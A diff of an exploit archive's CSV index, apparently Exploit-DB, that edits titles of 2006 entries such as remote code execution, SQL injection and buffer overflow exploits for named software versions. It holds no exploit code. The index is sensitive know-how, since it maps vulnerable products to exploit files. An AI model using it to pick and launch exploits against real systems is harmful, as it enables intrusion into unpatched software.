1473,platforms/hardware/dos/1473.c,"Sony/Ericsson Bluetooth (Reset Display) Denial of Service Exploit",2006-02-06,"Pierre Betouin",hardware,dos,0 1474,platforms/linux/remote/1474.pm,"Mozilla Firefox 1.5 - location.QueryInterface() Code Execution (Linux) (Metasploit)",2006-02-07,"H D Moore",linux,remote,0 1475,platforms/windows/dos/1475.html,"Microsoft Internet Explorer 7.0 Beta 2 - (urlmon.dll) Denial of Service",2006-02-07,"Tom Ferris",windows,dos,0 @@ -1225,1329 +1225,1329 @@ id,file,description,date,author,platform,type,port 1479,platforms/qnx/local/1479.sh,"QNX Neutrino 6.2.1 - (phfont) Race Condition Local Root Exploit",2006-02-08,kokanin,qnx,local,0 1480,platforms/osx/remote/1480.pm,"Mozilla Firefox 1.5 - location.QueryInterface() Code Execution (OSX) (Metasploit)",2006-02-08,"H D Moore",osx,remote,0 1481,platforms/qnx/local/1481.sh,"QNX RTOS 6.3.0 Insecure rc.local Permissions Plus System Crash Exploit",2006-02-08,kokanin,qnx,local,0 -1482,platforms/php/webapps/1482.php,"SPIP <= 1.8.2g Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0 -1483,platforms/multiple/dos/1483.pl,"Half-Life CSTRIKE Server <= 1.6 (Non Steam) - Denial of Service Exploit",2006-02-11,Firestorm,multiple,dos,0 +1482,platforms/php/webapps/1482.php,"SPIP 1.8.2g Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0 +1483,platforms/multiple/dos/1483.pl,"Half-Life CSTRIKE Server 1.6 (Non Steam) - Denial of Service Exploit",2006-02-11,Firestorm,multiple,dos,0 1484,platforms/php/webapps/1484.php,"FCKEditor 2.0 <= 2.2 - (FileManager connector.php) Remote Shell Upload Exploit",2006-02-09,rgod,php,webapps,0 -1485,platforms/php/webapps/1485.php,"RunCMS <= 1.2 - (class.forumposts.php) Arbitrary Remote Inclusion Exploit",2006-02-09,rgod,php,webapps,0 -1486,platforms/linux/remote/1486.c,"Power Daemon <= 2.0.2 - (WHATIDO) Remote Format String Exploit",2006-02-10,"Gotfault Security",linux,remote,532 -1487,platforms/linux/remote/1487.c,"OpenVMPSd <= 1.3 - Remote Format String Exploit",2006-02-10,"Gotfault Security",linux,remote,1589 +1485,platforms/php/webapps/1485.php,"RunCMS 1.2 - (class.forumposts.php) Arbitrary Remote Inclusion Exploit",2006-02-09,rgod,php,webapps,0 +1486,platforms/linux/remote/1486.c,"Power Daemon 2.0.2 - (WHATIDO) Remote Format String Exploit",2006-02-10,"Gotfault Security",linux,remote,532 +1487,platforms/linux/remote/1487.c,"OpenVMPSd 1.3 - Remote Format String Exploit",2006-02-10,"Gotfault Security",linux,remote,1589 1488,platforms/windows/dos/1488.txt,"Microsoft HTML Help Workshop - (.hhp) Denial of Service",2006-02-10,darkeagle,windows,dos,0 -1489,platforms/multiple/dos/1489.pl,"Invision Power Board <= 2.1.4 - (Register Users) Denial of Service Exploit",2006-02-10,SkOd,multiple,dos,0 +1489,platforms/multiple/dos/1489.pl,"Invision Power Board 2.1.4 - (Register Users) Denial of Service Exploit",2006-02-10,SkOd,multiple,dos,0 1490,platforms/windows/local/1490.c,"Microsoft HTML Help Workshop - (.hhp) Buffer Overflow Exploit (2)",2006-02-11,k3xji,windows,local,0 -1491,platforms/php/webapps/1491.php,"DocMGR <= 0.54.2 - (file_exists) Remote Commands Execution Exploit",2006-02-11,rgod,php,webapps,0 +1491,platforms/php/webapps/1491.php,"DocMGR 0.54.2 - (file_exists) Remote Commands Execution Exploit",2006-02-11,rgod,php,webapps,0 1492,platforms/php/webapps/1492.php,"Invision Power Board Army System Mod 2.1 - SQL Injection Exploit",2006-02-13,fRoGGz,php,webapps,0 -1493,platforms/php/webapps/1493.php,"EnterpriseGS <= 1.0 rc4 - Remote Commands Execution Exploit",2006-02-13,rgod,php,webapps,0 +1493,platforms/php/webapps/1493.php,"EnterpriseGS 1.0 rc4 - Remote Commands Execution Exploit",2006-02-13,rgod,php,webapps,0 1494,platforms/php/webapps/1494.php,"FlySpray 0.9.7 - (install-0.9.7.php) Remote Commands Execution Exploit",2006-02-13,rgod,php,webapps,0 1495,platforms/windows/local/1495.cpp,"Microsoft HTML Help Workshop - (.hhp) Buffer Overflow Exploit (3)",2006-02-14,darkeagle,windows,local,0 1496,platforms/hardware/dos/1496.c,"D-Link Wireless Access Point (Fragmented UDP) DoS Exploit",2006-02-14,"Aaron Portnoy",hardware,dos,0 -1498,platforms/php/webapps/1498.php,"webSPELL <= 4.01 - (title_op) Remote SQL Injection Exploit",2006-02-14,x128,php,webapps,0 +1498,platforms/php/webapps/1498.php,"webSPELL 4.01 - (title_op) SQL Injection Exploit",2006-02-14,x128,php,webapps,0 1499,platforms/php/webapps/1499.pl,"MyBulletinBoard (MyBB) <= 1.03 - Multiple SQL Injection Exploit",2006-02-15,"HACKERS PAL",php,webapps,0 1500,platforms/windows/dos/1500.cpp,"Windows Media Player 7.1 <= 10 - BMP Heap Overflow PoC (MS06-005) (1)",2006-02-15,ATmaCA,windows,dos,0 -1501,platforms/php/webapps/1501.php,"PHPKIT <= 1.6.1R2 - (filecheck) Remote Commands Execution Exploit",2006-02-16,rgod,php,webapps,0 +1501,platforms/php/webapps/1501.php,"PHPKIT 1.6.1R2 - (filecheck) Remote Commands Execution Exploit",2006-02-16,rgod,php,webapps,0 1502,platforms/windows/remote/1502.py,"Windows Media Player 7.1 <= 10 - BMP Heap Overflow PoC (MS06-005) (2)",2006-02-16,redsand,windows,remote,0 -1503,platforms/php/webapps/1503.pl,"YapBB <= 1.2 - (cfgIncludeDirectory) Remote Command Execution Exploit",2006-02-16,cijfer,php,webapps,0 +1503,platforms/php/webapps/1503.pl,"YapBB 1.2 - (cfgIncludeDirectory) Remote Command Execution Exploit",2006-02-16,cijfer,php,webapps,0 1504,platforms/windows/remote/1504.pm,"Microsoft Windows Media Player 9 - Plugin Overflow Exploit (MS06-006) (Metasploit)",2006-02-17,"H D Moore",windows,remote,0 1505,platforms/windows/remote/1505.html,"Microsoft Windows Media Player 10 - Plugin Overflow Exploit (MS06-006)",2006-02-17,"Matthew Murphy",windows,remote,0 1506,platforms/windows/remote/1506.c,"Microsoft Windows - Color Management Module Overflow Exploit (MS05-036) (2)",2006-02-17,darkeagle,windows,remote,0 1508,platforms/cgi/webapps/1508.pl,"AWStats < 6.4 - (referer) Remote Command Execution Exploit",2006-02-17,RusH,cgi,webapps,0 -1509,platforms/php/webapps/1509.pl,"Zorum Forum 3.5 - (rollid) Remote SQL Injection Exploit",2006-02-17,RusH,php,webapps,0 -1510,platforms/php/webapps/1510.pl,"Gravity Board X <= 1.1 - (csscontent) Remote Code Execution Exploit",2006-02-17,RusH,php,webapps,0 -1511,platforms/php/webapps/1511.php,"Coppermine Photo Gallery <= 1.4.3 - Remote Commands Execution Exploit",2006-02-17,rgod,php,webapps,0 -1512,platforms/php/webapps/1512.pl,"Admbook <= 1.2.2 - (X-Forwarded-For) Remote Command Execution Exploit",2006-02-19,rgod,php,webapps,0 -1513,platforms/php/webapps/1513.php,"BXCP <= 0.2.9.9 - (tid) Remote SQL Injection Exploit",2006-02-19,x128,php,webapps,0 -1514,platforms/asp/webapps/1514.pl,"MiniNuke <= 1.8.2b (pages.asp) Remote SQL Injection Exploit",2006-02-19,nukedx,asp,webapps,0 +1509,platforms/php/webapps/1509.pl,"Zorum Forum 3.5 - (rollid) SQL Injection Exploit",2006-02-17,RusH,php,webapps,0 +1510,platforms/php/webapps/1510.pl,"Gravity Board X 1.1 - (csscontent) Remote Code Execution Exploit",2006-02-17,RusH,php,webapps,0 +1511,platforms/php/webapps/1511.php,"Coppermine Photo Gallery 1.4.3 - Remote Commands Execution Exploit",2006-02-17,rgod,php,webapps,0 +1512,platforms/php/webapps/1512.pl,"Admbook 1.2.2 - (X-Forwarded-For) Remote Command Execution Exploit",2006-02-19,rgod,php,webapps,0 +1513,platforms/php/webapps/1513.php,"BXCP 0.2.9.9 - (tid) SQL Injection Exploit",2006-02-19,x128,php,webapps,0 +1514,platforms/asp/webapps/1514.pl,"MiniNuke 1.8.2b (pages.asp) SQL Injection Exploit",2006-02-19,nukedx,asp,webapps,0 1515,platforms/php/webapps/1515.pl,"GeekLog 1.x - (error.log) Remote Commands Execution Exploit (gpc = Off)",2006-02-20,rgod,php,webapps,0 -1516,platforms/php/webapps/1516.php,"ilchClan <= 1.05g (tid) Remote SQL Injection Exploit",2006-02-20,x128,php,webapps,0 -1517,platforms/php/dos/1517.c,"PunBB <= 2.0.10 - (Register Multiple Users) Denial of Service Exploit",2006-02-20,K4P0,php,dos,0 +1516,platforms/php/webapps/1516.php,"ilchClan 1.05g (tid) SQL Injection Exploit",2006-02-20,x128,php,webapps,0 +1517,platforms/php/dos/1517.c,"PunBB 2.0.10 - (Register Multiple Users) Denial of Service Exploit",2006-02-20,K4P0,php,dos,0 1518,platforms/linux/local/1518.c,"MySQL 4.x/5.0 - User-Defined Function (UDF) Local Privilege Escalation Exploit (Linux)",2006-02-20,"Marco Ivaldi",linux,local,0 1519,platforms/osx/remote/1519.pm,"Mac OS X Safari Browser - (Safe File) Remote Code Execution Exploit (Metasploit)",2006-02-22,"H D Moore",osx,remote,0 1520,platforms/windows/remote/1520.pl,"Microsoft Windows Media Player - Plugin Overflow Exploit (MS06-006) (3)",2006-02-22,"Matthew Murphy",windows,remote,0 -1521,platforms/php/webapps/1521.php,"Noahs Classifieds <= 1.3 - (lowerTemplate) Remote Code Execution",2006-02-22,trueend5,php,webapps,0 -1522,platforms/php/webapps/1522.php,"NOCC Webmail <= 1.0 - (Local Inclusion) Remote Code Execution Exploit",2006-02-23,rgod,php,webapps,0 -1523,platforms/php/webapps/1523.cpp,"PHP-Nuke 7.5 - 7.8 (Search) Remote SQL Injection Exploit",2006-02-23,unitedbr,php,webapps,0 -1524,platforms/php/webapps/1524.htm,"VHCS <= 2.4.7.1 - (Add User) Authentication Bypass Exploit",2006-02-23,RoMaNSoFt,php,webapps,0 -1525,platforms/php/webapps/1525.pl,"phpWebSite <= 0.10.0-full (topics.php) Remote SQL Injection Exploit",2006-02-24,SnIpEr_SA,php,webapps,0 -1526,platforms/php/webapps/1526.php,"Lansuite <= 2.1.0 Beta (fid) Remote SQL Injection Exploit",2006-02-24,x128,php,webapps,0 -1527,platforms/php/webapps/1527.pl,"iGENUS WebMail <= 2.0.2 - (config_inc.php) Remote Code Execution Exploit",2006-02-25,rgod,php,webapps,0 -1528,platforms/asp/webapps/1528.pl,"Pentacle In-Out Board <= 6.03 - (newsdetailsview) Remote SQL Injection",2006-02-25,nukedx,asp,webapps,0 -1529,platforms/asp/webapps/1529.htm,"Pentacle In-Out Board <= 6.03 - (login.asp) Remote Auth Bypass",2006-02-25,nukedx,asp,webapps,0 -1530,platforms/php/webapps/1530.pl,"SaphpLesson 2.0 - (forumid) Remote SQL Injection Exploit",2006-02-25,SnIpEr_SA,php,webapps,0 -1531,platforms/windows/dos/1531.pl,"ArGoSoft FTP Server <= 1.4.3.5 - Remote Buffer Overflow PoC",2006-02-25,"Jerome Athias",windows,dos,0 -1532,platforms/php/webapps/1532.pl,"PwsPHP <= 1.2.3 - (index.php) Remote SQL Injection Exploit",2006-02-25,papipsycho,php,webapps,0 -1533,platforms/php/webapps/1533.php,"4Images <= 1.7.1 - (Local Inclusion) Remote Code Execution Exploit",2006-02-26,rgod,php,webapps,0 +1521,platforms/php/webapps/1521.php,"Noahs Classifieds 1.3 - (lowerTemplate) Remote Code Execution",2006-02-22,trueend5,php,webapps,0 +1522,platforms/php/webapps/1522.php,"NOCC Webmail 1.0 - (Local Inclusion) Remote Code Execution Exploit",2006-02-23,rgod,php,webapps,0 +1523,platforms/php/webapps/1523.cpp,"PHP-Nuke 7.5 - 7.8 (Search) SQL Injection Exploit",2006-02-23,unitedbr,php,webapps,0 +1524,platforms/php/webapps/1524.htm,"VHCS 2.4.7.1 - (Add User) Authentication Bypass Exploit",2006-02-23,RoMaNSoFt,php,webapps,0 +1525,platforms/php/webapps/1525.pl,"phpWebSite 0.10.0-full (topics.php) SQL Injection Exploit",2006-02-24,SnIpEr_SA,php,webapps,0 +1526,platforms/php/webapps/1526.php,"Lansuite 2.1.0 Beta (fid) SQL Injection Exploit",2006-02-24,x128,php,webapps,0 +1527,platforms/php/webapps/1527.pl,"iGENUS WebMail 2.0.2 - (config_inc.php) Remote Code Execution Exploit",2006-02-25,rgod,php,webapps,0 +1528,platforms/asp/webapps/1528.pl,"Pentacle In-Out Board 6.03 - (newsdetailsview) SQL Injection",2006-02-25,nukedx,asp,webapps,0 +1529,platforms/asp/webapps/1529.htm,"Pentacle In-Out Board 6.03 - (login.asp) Remote Auth Bypass",2006-02-25,nukedx,asp,webapps,0 +1530,platforms/php/webapps/1530.pl,"SaphpLesson 2.0 - (forumid) SQL Injection Exploit",2006-02-25,SnIpEr_SA,php,webapps,0 +1531,platforms/windows/dos/1531.pl,"ArGoSoft FTP Server 1.4.3.5 - Remote Buffer Overflow PoC",2006-02-25,"Jerome Athias",windows,dos,0 +1532,platforms/php/webapps/1532.pl,"PwsPHP 1.2.3 - (index.php) SQL Injection Exploit",2006-02-25,papipsycho,php,webapps,0 +1533,platforms/php/webapps/1533.php,"4Images 1.7.1 - (Local Inclusion) Remote Code Execution Exploit",2006-02-26,rgod,php,webapps,0 1534,platforms/sco/local/1534.c,"SCO Unixware 7.1.3 - (ptrace) Local Privilege Escalation Exploit",2006-02-26,prdelka,sco,local,0 -1535,platforms/windows/dos/1535.c,"CrossFire <= 1.8.0 - (oldsocketmode) Remote Buffer Overflow PoC",2006-02-27,"Luigi Auriemma",windows,dos,0 +1535,platforms/windows/dos/1535.c,"CrossFire 1.8.0 - (oldsocketmode) Remote Buffer Overflow PoC",2006-02-27,"Luigi Auriemma",windows,dos,0 1536,platforms/windows/remote/1536.pm,"Microsoft Internet Explorer 6.0 SP0 - IsComponentInstalled() Remote Exploit (Metasploit)",2006-02-28,"H D Moore",windows,remote,0 -1537,platforms/windows/remote/1537.pm,"Kerio Personal Firewall <= 2.1.4 - Remote Authentication Packet Overflow (Metasploit)",2006-02-28,y0,windows,remote,44334 -1538,platforms/php/webapps/1538.pl,"farsinews <= 2.5 - Directory Traversal arbitrary (users.db) access Exploit",2006-02-28,Hessam-x,php,webapps,0 +1537,platforms/windows/remote/1537.pm,"Kerio Personal Firewall 2.1.4 - Remote Authentication Packet Overflow (Metasploit)",2006-02-28,y0,windows,remote,44334 +1538,platforms/php/webapps/1538.pl,"farsinews 2.5 - Directory Traversal arbitrary (users.db) access Exploit",2006-02-28,Hessam-x,php,webapps,0 1539,platforms/php/webapps/1539.txt,"MyBulletinBoard (MyBB) <= 1.03 - (misc.php COMMA) SQL Injection",2006-02-28,Devil-00,php,webapps,0 1540,platforms/bsd/dos/1540.pl,"FreeBSD 6.0 - (nfsd) Remote Kernel Panic Denial of Service Exploit",2006-02-28,"Evgeny Legerov",bsd,dos,0 -1541,platforms/php/webapps/1541.pl,"Limbo CMS <= 1.0.4.2 - (ItemID) Remote Code Execution Exploit",2006-03-01,str0ke,php,webapps,0 -1542,platforms/php/webapps/1542.pl,"phpRPC Library <= 0.7 XML Data Decoding Remote Code Execution",2006-03-01,LorD,php,webapps,0 -1543,platforms/php/webapps/1543.pl,"vuBB <= 0.2 - (Cookie) Final Remote SQL Injection Exploit (mq=off)",2006-03-01,KingOfSka,php,webapps,0 -1544,platforms/php/webapps/1544.pl,"Woltlab Burning Board 2.x Datenbank MOD (fileid) Remote SQL Injection",2006-03-01,nukedx,php,webapps,0 +1541,platforms/php/webapps/1541.pl,"Limbo CMS 1.0.4.2 - (ItemID) Remote Code Execution Exploit",2006-03-01,str0ke,php,webapps,0 +1542,platforms/php/webapps/1542.pl,"phpRPC Library 0.7 XML Data Decoding Remote Code Execution",2006-03-01,LorD,php,webapps,0 +1543,platforms/php/webapps/1543.pl,"vuBB 0.2 - (Cookie) Final SQL Injection Exploit (mq=off)",2006-03-01,KingOfSka,php,webapps,0 +1544,platforms/php/webapps/1544.pl,"Woltlab Burning Board 2.x Datenbank MOD (fileid) SQL Injection",2006-03-01,nukedx,php,webapps,0 1545,platforms/osx/local/1545.pl,"Apple Mac OS X - (/usr/bin/passwd) Custom Passwd Local Root Exploit",2006-03-01,vade79,osx,local,0 -1546,platforms/php/webapps/1546.pl,"phpRPC Library <= 0.7 XML Data Decoding Remote Code Execution (2)",2006-03-02,cijfer,php,webapps,0 +1546,platforms/php/webapps/1546.pl,"phpRPC Library 0.7 XML Data Decoding Remote Code Execution (2)",2006-03-02,cijfer,php,webapps,0 1547,platforms/php/webapps/1547.txt,"Aztek Forum 4.00 - (XSS/SQL) Multiple Vulnerabilities (PoC)",2006-03-02,lorenzo,php,webapps,0 1548,platforms/php/webapps/1548.pl,"MyBulletinBoard (MyBB) <= 1.04 - (misc.php COMMA) SQL Injection (2)",2006-03-03,Devil-00,php,webapps,0 -1549,platforms/php/webapps/1549.php,"PHP-Stats <= 0.1.9.1 - Remote Commands Execution Exploit",2006-03-04,rgod,php,webapps,0 -1550,platforms/asp/webapps/1550.txt,"TotalECommerce <= 1.0 - (index.asp id) Remote SQL Injection Exploit",2006-03-04,nukedx,asp,webapps,0 +1549,platforms/php/webapps/1549.php,"PHP-Stats 0.1.9.1 - Remote Commands Execution Exploit",2006-03-04,rgod,php,webapps,0 +1550,platforms/asp/webapps/1550.txt,"TotalECommerce 1.0 - (index.asp id) SQL Injection Exploit",2006-03-04,nukedx,asp,webapps,0 1551,platforms/hardware/dos/1551.txt,"Multiple Routers (IRC Request) Disconnect Denial of Service",2006-03-04,"Ryan Meyer",hardware,dos,0 1552,platforms/windows/dos/1552.pl,"XM Easy Personal FTP Server 1.0 - (Port) Remote Overflow PoC",2006-03-04,luka.research,windows,dos,0 -1553,platforms/php/webapps/1553.pl,"Fantastic News <= 2.1.2 - (script_path) Remote Code Execution Exploit",2006-03-04,uid0,php,webapps,0 +1553,platforms/php/webapps/1553.pl,"Fantastic News 2.1.2 - (script_path) Remote Code Execution Exploit",2006-03-04,uid0,php,webapps,0 1554,platforms/multiple/local/1554.c,"LibTiff 3.7.1 - (BitsPerSample Tag) Local Buffer Overflow Exploit",2006-03-05,"Agustin Gianni",multiple,local,0 1555,platforms/windows/local/1555.c,"Microsoft Visual Studio 6.0 sp6 - (.dbp) Buffer Overflow Exploit",2006-03-05,Kozan,windows,local,0 -1556,platforms/php/webapps/1556.pl,"D2-Shoutbox 4.2 IPB Mod (load) Remote SQL Injection Exploit",2006-03-06,SkOd,php,webapps,0 -1557,platforms/windows/dos/1557.c,"Freeciv <= 2.0.7 - (Jumbo Malloc) Denial of Service Crash",2006-03-06,"Luigi Auriemma",windows,dos,0 -1558,platforms/windows/dos/1558.c,"LieroX <= 0.62b Remote Server/Client Denial of Service Exploit",2006-03-06,"Luigi Auriemma",windows,dos,0 -1559,platforms/windows/dos/1559.c,"Sauerbraten <= 2006_02_28 - Multiple BoF/Crash Vulnerabilities Exploit",2006-03-06,"Luigi Auriemma",windows,dos,0 -1560,platforms/windows/dos/1560.c,"Cube <= 2005_08_29 - Multiple BoF/Crash Vulnerabilities Exploit",2006-03-06,"Luigi Auriemma",windows,dos,0 +1556,platforms/php/webapps/1556.pl,"D2-Shoutbox 4.2 IPB Mod (load) SQL Injection Exploit",2006-03-06,SkOd,php,webapps,0 +1557,platforms/windows/dos/1557.c,"Freeciv 2.0.7 - (Jumbo Malloc) Denial of Service Crash",2006-03-06,"Luigi Auriemma",windows,dos,0 +1558,platforms/windows/dos/1558.c,"LieroX 0.62b Remote Server/Client Denial of Service Exploit",2006-03-06,"Luigi Auriemma",windows,dos,0 +1559,platforms/windows/dos/1559.c,"Sauerbraten 2006_02_28 - Multiple BoF/Crash Vulnerabilities Exploit",2006-03-06,"Luigi Auriemma",windows,dos,0 +1560,platforms/windows/dos/1560.c,"Cube 2005_08_29 - Multiple BoF/Crash Vulnerabilities Exploit",2006-03-06,"Luigi Auriemma",windows,dos,0 1561,platforms/php/webapps/1561.pl,"OWL Intranet Engine 0.82 - (xrms_file_root) Code Execution Exploit",2006-03-07,rgod,php,webapps,0 -1562,platforms/asp/webapps/1562.pl,"CilemNews System <= 1.1 - (yazdir.asp haber_id) SQL Injection Exploit",2006-03-07,nukedx,asp,webapps,0 -1563,platforms/php/webapps/1563.pm,"Limbo CMS <= 1.0.4.2 - (ItemID) Remote Code Execution Exploit (Metasploit)",2006-03-07,sirh0t,php,webapps,0 -1564,platforms/windows/dos/1564.c,"Alien Arena 2006 Gold Edition <= 5.00 - Multiple Vulnerabilities",2006-03-07,"Luigi Auriemma",windows,dos,0 +1562,platforms/asp/webapps/1562.pl,"CilemNews System 1.1 - (yazdir.asp haber_id) SQL Injection Exploit",2006-03-07,nukedx,asp,webapps,0 +1563,platforms/php/webapps/1563.pm,"Limbo CMS 1.0.4.2 - (ItemID) Remote Code Execution Exploit (Metasploit)",2006-03-07,sirh0t,php,webapps,0 +1564,platforms/windows/dos/1564.c,"Alien Arena 2006 Gold Edition 5.00 - Multiple Vulnerabilities",2006-03-07,"Luigi Auriemma",windows,dos,0 1565,platforms/windows/remote/1565.pl,"RevilloC MailServer 1.21 - (USER) Remote Buffer Overflow Exploit PoC",2006-03-07,"securma massine",windows,remote,110 -1566,platforms/php/webapps/1566.php,"Gallery <= 2.0.3 - stepOrder[] Remote Commands Execution Exploit",2006-03-08,rgod,php,webapps,0 -1567,platforms/php/webapps/1567.php,"RedBLoG <= 0.5 - (cat_id) Remote SQL Injection Exploit",2006-03-08,x128,php,webapps,0 -1569,platforms/asp/webapps/1569.pl,"d2kBlog 1.0.3 - (memName) Remote SQL Injection Exploit",2006-03-09,DevilBox,asp,webapps,0 +1566,platforms/php/webapps/1566.php,"Gallery 2.0.3 - stepOrder[] Remote Commands Execution Exploit",2006-03-08,rgod,php,webapps,0 +1567,platforms/php/webapps/1567.php,"RedBLoG 0.5 - (cat_id) SQL Injection Exploit",2006-03-08,x128,php,webapps,0 +1569,platforms/asp/webapps/1569.pl,"d2kBlog 1.0.3 - (memName) SQL Injection Exploit",2006-03-09,DevilBox,asp,webapps,0 1570,platforms/php/webapps/1570.pl,"Light Weight Calendar 1.x - (date) Remote Code Execution",2006-03-09,Hessam-x,php,webapps,0 1571,platforms/asp/webapps/1571.htm,"JiRos Banner Experience 1.0 - (Create Admin Bypass) Remote Exploit",2006-03-09,nukedx,asp,webapps,0 1572,platforms/multiple/dos/1572.pl,"Dropbear / OpenSSH Server (MAX_UNAUTH_CLIENTS) Denial of Service",2006-03-10,str0ke,multiple,dos,0 -1573,platforms/php/dos/1573.php,"Guppy <= 4.5.11 - (Delete Databases) Remote Denial of Service Exploit",2006-03-10,trueend5,php,dos,0 -1574,platforms/linux/remote/1574.c,"PeerCast <= 0.1216 - (nextCGIarg) Remote Buffer Overflow Exploit",2006-03-11,prdelka,linux,remote,7144 -1575,platforms/php/webapps/1575.pl,"GuestBook Script <= 1.7 - (include_files) Remote Code Execution Exploit",2006-03-11,rgod,php,webapps,0 -1576,platforms/php/webapps/1576.txt,"Jupiter CMS <= 1.1.5 - Multiple XSS Attack Vectors",2006-03-11,Nomenumbra,php,webapps,0 -1577,platforms/irix/local/1577.sh,"SGI IRIX <= 6.5.28 - (runpriv) Design Error",2005-10-10,anonymous,irix,local,0 -1578,platforms/linux/remote/1578.c,"PeerCast <= 0.1216 - (nextCGIarg) Remote Buffer Overflow Exploit (2)",2006-03-12,darkeagle,linux,remote,7144 +1573,platforms/php/dos/1573.php,"Guppy 4.5.11 - (Delete Databases) Remote Denial of Service Exploit",2006-03-10,trueend5,php,dos,0 +1574,platforms/linux/remote/1574.c,"PeerCast 0.1216 - (nextCGIarg) Remote Buffer Overflow Exploit",2006-03-11,prdelka,linux,remote,7144 +1575,platforms/php/webapps/1575.pl,"GuestBook Script 1.7 - (include_files) Remote Code Execution Exploit",2006-03-11,rgod,php,webapps,0 +1576,platforms/php/webapps/1576.txt,"Jupiter CMS 1.1.5 - Multiple XSS Attack Vectors",2006-03-11,Nomenumbra,php,webapps,0 +1577,platforms/irix/local/1577.sh,"SGI IRIX 6.5.28 - (runpriv) Design Error",2005-10-10,anonymous,irix,local,0 +1578,platforms/linux/remote/1578.c,"PeerCast 0.1216 - (nextCGIarg) Remote Buffer Overflow Exploit (2)",2006-03-12,darkeagle,linux,remote,7144 1579,platforms/linux/local/1579.pl,"Ubuntu 5.10 - Installer Password Disclosure",2006-03-12,"Kristian Hermansen",linux,local,0 -1581,platforms/php/webapps/1581.pl,"Simple PHP Blog <= 0.4.7.1 - Remote Command Execution Exploit",2006-03-13,rgod,php,webapps,0 -1582,platforms/linux/remote/1582.c,"crossfire-server <= 1.9.0 - SetUp() Remote Buffer Overflow Exploit",2006-03-13,landser,linux,remote,13327 +1581,platforms/php/webapps/1581.pl,"Simple PHP Blog 0.4.7.1 - Remote Command Execution Exploit",2006-03-13,rgod,php,webapps,0 +1582,platforms/linux/remote/1582.c,"crossfire-server 1.9.0 - SetUp() Remote Buffer Overflow Exploit",2006-03-13,landser,linux,remote,13327 1583,platforms/osx/remote/1583.pl,"Apple Mac OS X 10.4.5 Mail.app (Real Name) Buffer Overflow Exploit",2006-03-13,"Kevin Finisterre",osx,remote,25 1584,platforms/windows/local/1584.cpp,"Microsoft Windows Telephony Service Command Execution Exploit (MS05-040)",2006-03-14,"Cesar Cerrudo",windows,local,0 -1585,platforms/php/webapps/1585.php,"php iCalendar <= 2.21 - (Cookie) Remote Code Execution Exploit",2006-03-15,rgod,php,webapps,0 -1586,platforms/php/webapps/1586.php,"php iCalendar <= 2.21 - (publish.ical.php) Remote Code Execution Exploit",2006-03-15,rgod,php,webapps,0 +1585,platforms/php/webapps/1585.php,"php iCalendar 2.21 - (Cookie) Remote Code Execution Exploit",2006-03-15,rgod,php,webapps,0 +1586,platforms/php/webapps/1586.php,"php iCalendar 2.21 - (publish.ical.php) Remote Code Execution Exploit",2006-03-15,rgod,php,webapps,0 1587,platforms/php/webapps/1587.pl,"KnowledgebasePublisher 1.2 - (include) Remote Code Execution Exploit",2006-03-15,uid0,php,webapps,0 -1588,platforms/php/webapps/1588.php,"nodez <= 4.6.1.1 mercury - Multiple Vulnerabilities",2006-03-18,rgod,php,webapps,0 -1589,platforms/asp/webapps/1589.pl,"BetaParticle Blog <= 6.0 - (fldGalleryID) Remote SQL Injection Exploit",2006-03-18,nukedx,asp,webapps,0 -1590,platforms/php/webapps/1590.pl,"ShoutLIVE <= 1.1.0 - (savesettings.php) Remote Code Execution Exploit",2006-03-18,DarkFig,php,webapps,0 -1591,platforms/linux/local/1591.py,"Python <= 2.4.2 realpath() Local Stack Overflow Exploit",2006-03-18,"Gotfault Security",linux,local,0 +1588,platforms/php/webapps/1588.php,"nodez 4.6.1.1 mercury - Multiple Vulnerabilities",2006-03-18,rgod,php,webapps,0 +1589,platforms/asp/webapps/1589.pl,"BetaParticle Blog 6.0 - (fldGalleryID) SQL Injection Exploit",2006-03-18,nukedx,asp,webapps,0 +1590,platforms/php/webapps/1590.pl,"ShoutLIVE 1.1.0 - (savesettings.php) Remote Code Execution Exploit",2006-03-18,DarkFig,php,webapps,0 +1591,platforms/linux/local/1591.py,"Python 2.4.2 realpath() Local Stack Overflow Exploit",2006-03-18,"Gotfault Security",linux,local,0 1592,platforms/windows/remote/1592.c,"Mercur Mailserver 5.0 SP3 - (IMAP) Remote Buffer Overflow Exploit",2006-03-19,pLL,windows,remote,0 1593,platforms/windows/dos/1593.c,"Mercur Mailserver 5.0 SP3 - (IMAP) Denial of Service Exploit",2006-03-19,Omni,windows,dos,0 1594,platforms/php/webapps/1594.py,"SoftBB 0.1 - (mail) Remote Blind SQL Injection Exploit",2006-03-19,LOTFREE,php,webapps,0 -1595,platforms/php/webapps/1595.php,"gCards <= 1.45 - Multiple Vulnerabilities",2006-03-20,rgod,php,webapps,0 +1595,platforms/php/webapps/1595.php,"gCards 1.45 - Multiple Vulnerabilities",2006-03-20,rgod,php,webapps,0 1596,platforms/linux/local/1596.txt,"X.Org X11 (X11R6.9.0/X11R7.0) - Local Privilege Escalation Exploit",2006-03-20,"H D Moore",linux,local,0 -1597,platforms/asp/webapps/1597.pl,"ASPPortal <= 3.1.1 - (downloadid) Remote SQL Injection Exploit",2006-03-20,nukedx,asp,webapps,0 +1597,platforms/asp/webapps/1597.pl,"ASPPortal 3.1.1 - (downloadid) SQL Injection Exploit",2006-03-20,nukedx,asp,webapps,0 1598,platforms/windows/dos/1598.html,"Microsoft Internet Explorer 6.0 - (script action handlers) (mshtml.dll) DoS",2006-03-21,"Michal Zalewski",windows,dos,0 1599,platforms/windows/dos/1599.cpp,"Microsoft Windows 2003/XP - (IGMP v3) Denial of Service Exploit (MS06-007)",2006-03-21,"Alexey Sintsov",windows,dos,0 -1600,platforms/php/webapps/1600.php,"FreeWPS <= 2.11 - (images.php) Remote Code Execution Exploit",2006-03-21,x128,php,webapps,0 +1600,platforms/php/webapps/1600.php,"FreeWPS 2.11 - (images.php) Remote Code Execution Exploit",2006-03-21,x128,php,webapps,0 1601,platforms/windows/dos/1601.c,"ASP.NET w3wp (COM Components) Remote Crash Exploit",2006-03-22,"Debasis Mohanty",windows,dos,0 1602,platforms/multiple/remote/1602.c,"BomberClone < 0.11.6.2 - (Error Messages) Remote Buffer Overflow Exploit",2006-03-22,"esca zoo",multiple,remote,11000 1603,platforms/windows/dos/1603.c,"Microsoft Windows 2003/XP - (IGMP v3) Denial of Service Exploit (MS06-007) (2)",2006-03-22,Firestorm,windows,dos,0 1604,platforms/windows/dos/1604.html,"Microsoft Internet Explorer 6.0 - (mshtml.dll checkbox) Crash",2006-03-22,"Stelian Ene",windows,dos,0 